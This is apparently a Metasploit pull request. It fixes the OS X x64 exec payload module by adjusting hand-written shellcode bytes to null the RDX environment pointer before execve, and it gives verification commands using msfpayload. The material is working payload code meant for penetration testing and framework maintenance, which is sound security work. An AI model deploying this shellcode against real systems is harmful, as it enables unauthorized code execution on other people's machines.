### PR TITLE
Fix crash in osx/x64/exec on 10.9 Mavericks

### DIFF
--- a/modules/payloads/singles/osx/x64/exec.rb
+++ b/modules/payloads/singles/osx/x64/exec.rb
@@ -36,13 +36,13 @@ module Metasploit3
     arg_str = cmd_parts.map { |a| "#{a}\x00" }.join
     call = "\xe8" + [arg_str.length].pack('V')
     payload =
-      "\x48\x31\xc0" +                                # xor rax, rax
+      "\x48\x31\xd2"+                                 # xor rdx, rdx
       call +                                          # call CMD.len
       arg_str  +                                      # CMD
       "\x5f" +                                        # pop rdi
       if cmd_parts.length > 1
         "\x48\x89\xf9" +                            # mov rcx, rdi
-        "\x50" +                                    # push null
+        "\x52" +                                    # push rdx (null)
         # for each arg, push its current memory location on to the stack
         cmd_parts[1..-1].each_with_index.map do |arg, idx|
           "\x48\x81\xc1" +                        # add rcx + ...
@@ -50,7 +50,7 @@ module Metasploit3
           "\x51"                                  # push rcx (build str array)
         end.join
       else
-        "\x50"                                      # push null
+        "\x52"                                      # push rdx (null)
       end +
       "\x57"+                                         # push rdi
       "\x48\x89\xe6"+	                                # mov rsi, rsp


### PR DESCRIPTION
RM #8771

I played it fast and loose with the ENV pointer for the execve call, which was causing a crash on 10.9. I've nulled out RDX (the env ptr).

Verification
- [x] `./msfpayload osx/x64/exec cmd="/usr/bin/id" X > x64_test_id`
- [x] Runs on OSX 10.9
- [x] Runs on OSX < 10.9
